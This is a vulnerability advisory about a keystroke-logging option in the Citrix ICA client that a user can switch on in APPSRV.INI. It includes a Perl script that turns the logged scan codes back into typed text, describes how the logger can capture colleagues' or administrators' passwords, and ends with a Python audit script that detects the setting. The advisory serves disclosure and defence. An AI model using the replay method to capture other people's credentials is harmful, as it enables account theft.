Overview:
The Citrix ICA client has a built-in keyboard logger that can be activated by a check box in CPN (Citrix Program Neighborhood) or by editing the file APPSRV.INI by hand. This configuration file and the associated log files are stored by default in the user profile directory; they are first created in '\Documents and Settings\%username%\Application Data\ICAClient\'. With a default installation of Microsoft Windows 2000/XP the user has Full Control (NTFS) over his/her own profile directory on the workstation. Therefore an ordinary user can edit his own APPSRV.INI.
Credit:
The information has been provided by Andre van der Lingen and Robert-Jan Mora.
The original article can be found at: http://www.hoffmannbv.nl/forensisch/nieuws/citrixkeyboardlogger.html
Systems Affected:
* MetaFrame Presentation Server Client (Versions 8.0 and earlier)
* ICA Win32 Program Neighborhood Client (Citrix Program Neighbourhood) 7.0 and 8.0
* Citrix Webclient version 7.0 and 8.0
Comments by Citrix on the APPSRV.INI
From the Citrix Knowledge Base
Document ID: CTX331178
See the following URL for the Citrix Knowledge base article: http://hqextsrvsft01.citrix.com/kb/entry!default.jspa?categoryID=149&entryID=850&fromSearchPage=true.
LogKeyboard=Off
Logs keyboard data. Values are On or Off. It will log an event whenever you press a key on the keyboard or move the mouse. This is primarily intended for technical support purposes.
LogAppend=Off
The event log can be overwritten by new events or new events can be added to the end of the existing file. Specify On to save old events and add new events to the end of the file. Specify Off to overwrite old events.
SSOnUserSetting=On
Selects (On) or clears (Off) pass-through authentication.
With the default installation of the Citrix ICA client these functions are NOT enabled. When LogKeyboard=On is set, however, the ICA client logs the keyboard scan code of every pressed key to the file WFCWIN32.LOG for the duration of the Citrix Terminal Server session. This log file is NOT encrypted or secured in any way. With a simple translation of the log file it is possible to replay every keystroke of that Citrix Terminal Server session.
All secondary sign-ons (user credential validations) and every other form of authentication or information entered via the keyboard are therefore compromised.
Technical Description:
When the Citrix keyboard log function is activated, all keyboard scan codes are logged to the file WFCWIN32.LOG. Whenever the Citrix ICA client is used to run Citrix Published Applications, every keystroke is written to this log file. Some example output:
09-11-2004 10:19:19:250 Remote Administrator viewer: KEYBOARD: scan (2E)
09-11-2004 10:19:19:250 Remote Administrator viewer: KEYBOARD: scan (17)
09-11-2004 10:19:36:750 Remote Administrator viewer: KEYBOARD: scan (14)
09-11-2004 10:19:36:843 Remote Administrator viewer: KEYBOARD: scan (13)
09-11-2004 10:19:36:859 Remote Administrator viewer: KEYBOARD: scan (17)
09-11-2004 10:19:36:937 Remote Administrator viewer: KEYBOARD: scan (2D).
Documents for translating these keyboard scan codes are widely available on the Internet. By translating the scan codes you can replay the exact keystrokes of the user who used the Citrix ICA client to log on to his e-mail applications, financial applications, documents and so on. Every pressed key is captured in this log file.
With the following Perl program it is very easy to translate a WFCWIN32.LOG file containing keyboard scan codes into a replay of the user's keystrokes during the Citrix Terminal Server session.
Code snippet:
# Version: 1.0
# Date: 09 September 2004
# Description: Program to translate Citrix keyboard scan codes into a replay of the keyboard strokes
# The original WFCWIN32.LOG file is given as the parameter of this Perl script
# Credits: Andre van der Lingen - System Engineer Interpay Nederland B.V.
# Robert-Jan Mora - Forensic Investigator Hoffmann Investigations
# Best performance in Perl 5.6.1 due to Time::HiRes module issues in 5.8
use strict;
use warnings;
# Modules
use Time::HiRes qw(usleep);

my %table;          # scan code -> two characters: unshifted, then shifted
my @ALL;            # lines of the log file
my $shift_key = 0;  # set when the previous scan code was a shift key

####################################### Main ################################
# Read associative array of scan codes
read_array();
my $FILE = $ARGV[0];
if (!defined $FILE || $FILE eq "") {
    die "Give log file as parameter\n";
}
# Open the Citrix log file given as parameter
open_file($FILE);
# Process and translate the log file
foreach my $line (@ALL) {
    chomp $line;
    # Only lines carrying a scan code, e.g. "KEYBOARD: scan (2E)", are translated
    next unless $line =~ /\(([0-9A-Fa-f]{2})\)/;
    my $scancode = uc $1;
    if ($scancode eq "36" or $scancode eq "2A") {
        $shift_key = 1;   # the next key is printed as its shifted character
        next;
    }
    print_output($scancode);
}
print "\n";
####################################### Subs ################################
# Not scanning for release scan codes.
sub print_output {
    my ($scancode) = @_;
    usleep 100000;   # slow the replay down to typing speed
    my $table_value = $table{$scancode};
    return unless defined $table_value;   # unknown scan code: skip it
    if ($shift_key) {
        $table_value =~ s/^.//;   # keep the shifted character
    } else {
        $table_value =~ s/.$//;   # keep the unshifted character
    }
    print $table_value;
    $shift_key = 0;
}
sub open_file {
    my ($file) = @_;
    if (-e $file) {
        open(F, '<', $file) || die "Could not open file $file: $!";
        @ALL = <F>;
        close F;
    } else {
        die "Could not find file $file\n";
    }
}
sub read_array {
    %table = ("1E","aA",
        "30","bB",
        "2E","cC",
        "20","dD",
        "12","eE",
        "21","fF",
        "22","gG",
        "23","hH",
        "17","iI",
        "24","jJ",
        "25","kK",
        "26","lL",
        "32","mM",
        "31","nN",
        "18","oO",
        "19","pP",
        "10","qQ",
        "13","rR",
        "1F","sS",
        "14","tT",
        "16","uU",
        "2F","vV",
        "11","wW",
        "2D","xX",
        "15","yY",
        "2C","zZ",
        "02","1!",
        "03","2@",
        "04","3#",
        "05","4\$",
        "06","5%",
        "07","6^",
        "08","7&",
        "09","8*",
        "0A","9(",
        "0B","0)",
        "39","  ", # Two spaces
        "1C","\n\n",
        "0F","\t\t",
        "0E","\b\b",
        "0C","-_",
        "0D","=+",
        "1A","[{",
        "1B","]}",
        "2B","\\|",
        "27",";:",
        "28","'\"",
        "29","`~",
        "33",",<",
        "34",".>",
        "35","/?",
        "36"," -RightShift- ",
        "2A"," -LeftShift- ");
}
Risks:
Malicious User
It is possible for a user to edit the APPSRV.INI and change all values concerning logging, encryption, single sign-on, etc. With the single sign-on option turned off it is possible to capture the initial logon to the Citrix Terminal Server session; the username and password are logged perfectly in the Citrix log file of the current user on the workstation. There are several possible scenarios in which a malicious user asks a colleague, or worse, a system administrator, to use his/her workstation to start Citrix Published Applications. This is possible via the console and also with a remote desktop application such as Remote Administrator. The keystrokes are logged when that colleague or system administrator logs on with his credentials to start the Citrix Published Applications.
Credentials for e-mail logins, financial application logins, password-protected documents, private information, etc. are captured during these Citrix Terminal Server sessions.
Virus/Trojan/Worms
Another risk is a virus, trojan or worm that enables these parameters in the APPSRV.INI and collects the WFCWIN32.LOG files. Many home workers log on to the corporate network from their home PC.
Protection:
A new ICA client without keyboard logging functionality, or encryption of the WFCWIN32.LOG file.
Patch/New Client:
After we reported this security flaw to Citrix, they released a new ICA client without the keyboard logging functionality (version 8.1). See the following URL for the new client: http://support.citrix.com/hotfixes.jsp. Citrix has built a separate debug version of the ICA client for troubleshooting purposes only. Before applying the patch we advise every (large) organization that uses the Citrix ICA client to check the APPSRV.INI files on their network for the modified settings described in the overview above. There is always the possibility that this flaw has been exploited in the wild for a long time without being noticed or reported. Alternatively, Hoffmann Forensic Services can assist you in checking your network in an automated way. If altered APPSRV.INI files are discovered on your network, contact us at alerts@hoffmannbv.nl to take the proper actions.
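The check recommended above, written here as an added example (not the advisory's or Citrix's code): it scans APPSRV.INI text for the LogKeyboard, SSOnUserSetting and LogAppend values quoted from the Citrix KB, and counts "KEYBOARD: scan" events in a WFCWIN32.LOG. The [Sample] section name and the "session start" log line in the embedded samples are constructed placeholders; the real file layout may differ.

```python
import re

# Settings quoted from Citrix KB CTX331178 in the advisory, with the value
# that signals a problem. LogAppend=On alone is not dangerous, but it keeps
# keystrokes of earlier sessions, so it is reported as informational.
RISKY_SETTINGS = {
    "logkeyboard": ("on", "CRITICAL: keystroke scan codes are written to WFCWIN32.LOG"),
    "ssonusersetting": ("off", "HIGH: pass-through auth disabled, initial logon is typed in"),
    "logappend": ("on", "INFO: keystrokes of earlier sessions are kept in the log"),
}

def parse_ini(text):
    """Minimal line-based INI parser returning [(section, key, value)]; unlike
    configparser it also sees keys before any [section] and duplicate keys."""
    entries, section = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            continue
        key, sep, value = line.partition("=")
        if sep:
            entries.append((section, key.strip(), value.strip()))
    return entries

def audit_appsrv_ini(text):
    """Return one finding string per risky key=value present in APPSRV.INI."""
    findings = []
    for section, key, value in parse_ini(text):
        rule = RISKY_SETTINGS.get(key.lower())
        if rule and value.lower() == rule[0]:
            findings.append(f"[{section}] {key}={value}: {rule[1]}")
    return findings

# One log line per pressed key, in the format of the advisory's sample output.
KEY_EVENT = re.compile(r"KEYBOARD: scan \([0-9A-Fa-f]{2}\)")

def count_logged_keystrokes(log_text):
    """Number of logged key presses; non-zero means the logger was active."""
    return sum(1 for line in log_text.splitlines() if KEY_EVENT.search(line))

# Constructed samples: the [Sample] section and the 'session start' line are
# placeholders, not the real client's layout.
SAMPLE_INI = "[Sample]\nLogKeyboard=On\nLogAppend=Off\nSSOnUserSetting=Off\n"
SAMPLE_LOG = ("09-11-2004 10:19:10:000 Remote Administrator viewer: session start\n"
              "09-11-2004 10:19:19:250 Remote Administrator viewer: KEYBOARD: scan (2E)\n"
              "09-11-2004 10:19:19:250 Remote Administrator viewer: KEYBOARD: scan (17)\n")
```

Run audit_appsrv_ini over every APPSRV.INI found under the user profiles and count_logged_keystrokes over any WFCWIN32.LOG beside it; a non-empty finding list or a non-zero count is what to investigate.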
Research:
Further research has to be done on the ICA client on other platforms; we tested on Windows 2000 and Windows XP. There are many options in this file that can pose a security risk on your network. See the Citrix KB description of the APPSRV.INI: Document ID: CTX331178.
Comments:
The authors of this advisory were flabbergasted that keylogger functionality is implemented in the ICA client and available to ordinary users. For a long time malicious users have had the opportunity to misuse your systems, either directly or by means of trojans.
Citrix Security Bulletin:
Citrix has published its own security bulletin. The bulletin can be found at the following location: http://support.citrix.com/kb/entry.jspa?externalID=CTX105215
Vendor response:
See vendor response at the following URL: http://support.citrix.com/kb/entry.jspa?entryID=5536&categoryID=149